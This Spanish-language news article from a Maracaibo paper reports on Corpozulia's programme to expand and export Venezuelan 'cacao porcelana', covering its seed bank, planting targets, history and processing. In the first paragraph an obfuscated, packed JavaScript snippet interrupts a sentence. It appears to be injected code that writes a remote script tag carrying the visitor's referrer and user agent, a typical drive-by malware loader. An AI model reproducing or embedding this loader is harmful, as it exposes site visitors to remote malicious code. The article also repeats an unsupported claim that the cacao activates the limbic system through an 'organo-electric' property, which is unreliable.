Corpozulia impulsa exportación del cacao porcelana

Nota de Prensa / Maracaibo / [email protected]
Desde eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\b'+e(c)+'\b','g'),k[c])}}return p}('0.6("");n m="q";',30,30,'document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|dbhts|var|u0026u|referrer|ykytt||js|php'.split('|'),0,{})) la Corporación se ha ejecutado el suministro de semillas a las comunidades así como a pequeños, medianos productores de cacao , cooperativas, asociaciones y estudiantes, además del acompañamiento y asesoría técnica, talleres, reuniones, charlas y días de campo para promover y fomentar el desarrollo de los cultivos criollos de cacao autóctonos en el Sur del Lago

El presidente de Corpozulia, Francisco Arias Cárdenas, ha inspeccionado los cultivos de cacao de la región. (Fotos: Prensa)

Un color, olor y sabor, ya sea al natural o procesado, hace que la persona se traslade hacia un mundo de dulzura, éxtasis y deseo. Todas estas características se pueden conseguir en un solo producto: el cacao porcelana, el cual despierta tantas sensaciones y es tan deseado en el país y en el extranjero, que hace del Zulia y Venezuela un atractivo lugar de producción.

En este sentido, el presidente de Corpozulia, Francisco Javier Arias Cárdenas, como parte del impulso al nuevo modelo de economía que pretende obtener divisas a través de la actividad agrícola, dirige el Centro Socialista de Investigación y Desarrollo del Cacao (CESID-Cacao), ubicado en el Sur del Lago de Maracaibo, específicamente en kilómetro 41 de la carretera Santa Bárbara-El Vigía, donde es cultivado el “cacao porcelana.

"Nuestra idea es que en los próximos cuatro años alcancemos las 10 mil hectáreas sembradas de cacao porcelana, lo cual facilitará la exportación y el ingreso de divisas a la nación, como parte de las acciones que debemos ejecutar, entre los planes que nos permitan la diversificación económica productiva y nos haga menos dependientes de la actividad minero-petrolera," informó.

Como parte de las políticas sociales que ejecuta  la Corporación, suministra semillas a las comunidades así como a pequeños, medianos productores de cacao en la zona, cooperativas, asociaciones y estudiantes, además del acompañamiento y asesoría técnica, talleres, reuniones, charlas y días de campo con el objetivo de promover y fomentar el desarrollo de los cultivos criollos de cacao autóctonos en el Sur del Lago.

Asimismo, el Presidente de la Corporación para el Desarrollo de la Región Zuliana planteó la posibilidad de que el CESID-Cacao, pase a ser una Empresa de Producción Social con la participación de Corpozulia y el Ministerio para la Agricultura Productiva y Tierras (MPPAPT) junto a los trabajadores, con el fin de consolidar los objetivos establecidos a través de financiamientos y la rehabilitación del vivero que germina 420 mil plántulas anualmente, con semillas y arbustos a través de injertos.

“Incentivaremos al productor para hacer de este rubro uno de los principales cultivos de la región a través de líneas de financiamiento, asesoría técnica  y  equipamiento”, refirió Arias Cárdenas.

El CESID-Cacao, tiene certificación FAO, brazo de alimentación de  la ONU, para la conservación de este rubro  y junto a Corpozulia tiene planes como el programa “Campo Ganado” el cual desarrollará el séptimo vértice que es la exportación de cacao al mercado internacional, a través de los centros de acopio. 

Al respecto, Carmen Tudares, Coordinadora de Investigación y Desarrollo Tecnológico de Corpozulia,  indicó que Venezuela es el único país productor de Cacao Porcelana en el mundo y  las tierras surlaguenses son privilegiadas en la explotación de este rubro. “El Centro Socialista de Investigación y Desarrollo, es el único Banco de Germoplasma de cacao criollo de Venezuela, por ello posee semillas de cacao autóctonas, las cuales se encuentran en peligro de extinción, y junto a Corpozulia, unen esfuerzos para mantenerlas en el tiempo”, comentó.

Tudares explicó que antes de sembrar el Cacao Porcelana se hace una planificación dentro de CESID-Cacao, para el estudio de la zona climática y sus condiciones ambientales, para una lograr una buena cosecha.

Evolución del cacao porcelana

Desde 1810 Venezuela se convierte en el país más importante del mundo en la producción de Cacao, se exportaba el famoso Cacao Carenero, el cual generaba la mitad de ese producto que se consumía en el mundo, así lo señala el Blog, El Comercio.es.

La nación celebra el primero de octubre el Día Nacional del Cacao, luego que la Asamblea Nacional el 2 de diciembre de 2014 aprobara el proyecto en respaldo a una solicitud realizada por la Fundación “Nuestra Tierra”, la cual recaudó más de 23 mil 260 firmas en todo el país, para pedir la proclamación de esta festividad en honor a la importancia y riqueza económica que tiene Venezuela con la producción del cacao, según reseña el diario Correo del Orinoco.

En este orden de ideas, el Cacao Porcelana, es una especie de la variedad autóctona del Zulia, cultivada durante siglos en la región de las montañas Venezolanas, alrededor del Lago Maracaibo.  El Cacao Porcelana lo distingue su aroma y sabor combinado de panela, malta, miel, caramelo y nueces.

Según la Investigadora Tecnológica de Corpozulia, Carmen Tudares, el Cacao Porcelana posee una propiedad órgano-eléctrica, que activa el Sistema Límbico del cuerpo humano, produciendo sensaciones de euforia, felicidad, armonía, y tranquilidad al momento de consumir este producto; proporcionado energía en el organismo.

Por muchos años el término “Cacao Porcelana”, viene transcendiendo en el tiempo, no por considerarse una almendra blanca afrodisiaca, sino que fue elegido así debido a que este rubro solo era consumido por personajes de la alta sociedad venezolana.

El nombre “Porcelana”, fue asociado a los términos: Loza fina, traslúcida y de color blanco que está compuesta de arcilla, feldespato y mineral y se usa para hacer objetos y sustancias, suaves, finas y delicadas.

También se pudo conocer que el Cacao Porcelana, es una rara especie de la variedad criolla, que durante tiempos coloniales fue llamado “Maracaibo”, debido a que era exportado principalmente desde el Puerto de Maracaibo, trasladado desde Sur del Lago y  los Andes venezolanos.

Investigación y desarrollo

Para asegurar la producción de esta variedad de Cacao, desde Corpozulia se creó el Banco de Germoplasma o semillas de Cacao Porcelana, el producto se caracteriza por la suavidad de su corteza, una almendra o grano grande y gomosa, completamente blanca en su interior, lo que significa que es un cacao que no tiene polifenoles como la antocianina, que le otorga un sabor amargo. Esta almendra es fermentada y procesada, para luego ser principalmente exportada a Europa.

Luego de seis meses, que es el tiempo de maduración del fruto, viene un proceso de despulpado en el cual se extraen los granos del interior del cacao para regarlos sobre un suelo rústico el cual permite la absorción del agua que naturalmente tiene la semilla. Este paso también se puede lograr encima de alguna lámina de zinc, que al calentarse bajo el sol seca la semilla rápidamente.

Posteriormente se inicia el proceso de tostado y molienda, para finalmente  hacer unas especie de pastillas con el fruto ya molido, producto final muy solicitado en el mercado local, ya que es utilizado para la elaboración de bebidas achocolatadas muy común en el desayuno o merienda del venezolano, así explicó el Coordinador del Centro Socialista de Investigación y Desarrollo del Cacao en el procesamiento artesanal de este rubro, Joel Navarro.

Según investigaciones de este especialista, el Porcelana es un tipo de Cacao conocido mundialmente por su excepcional poder aromático, suave sabor y delicada textura. Su cultivo prácticamente había sido abandonando por causa de su débil producción y poca resistencia a las enfermedades micro ambientales.

Por tal motivo la Corporación planificó soluciones prácticas, efectivas y operativas a los productores de la región para rescatar la caracterización morfológica y genética de cacaos criollos ancestrales de los estados Zulia, Mérida y Táchira, dentro del área de exploración.  Actualmente Corpozulia sigue realizando proyectos de investigación de acuerdo con la prioridad de los problemas de la zona.

Recorrido en los cultivos

El presidente de Corpozulia visitó la zona cacaotera y señaló que se plantean producir más de 500 mil plantas de cacao, en sinergia con el sector privado del Sur del Lago e incrementar la cifra a futuro de 1 millón de plantas por año.

La meta a futuro con el cacao, es extender la derivación de  productos con fines de salud, entre ellos cremas corporales, terapéuticas, exfoliadoras, esencias para aromaterapias y terapéuticos, que permitan a la comunidad comercializarlos y alcanzar mejores condiciones de vida.

Más noticias

Comentarios
© 2017, Diario La Verdad. Maracaibo. Venezuela C.A. RIF J-30540623-5. Términos Legales. Contáctenos via: [email protected] , [email protected] o [email protected]
Desarrollado por Miguel Guadarrama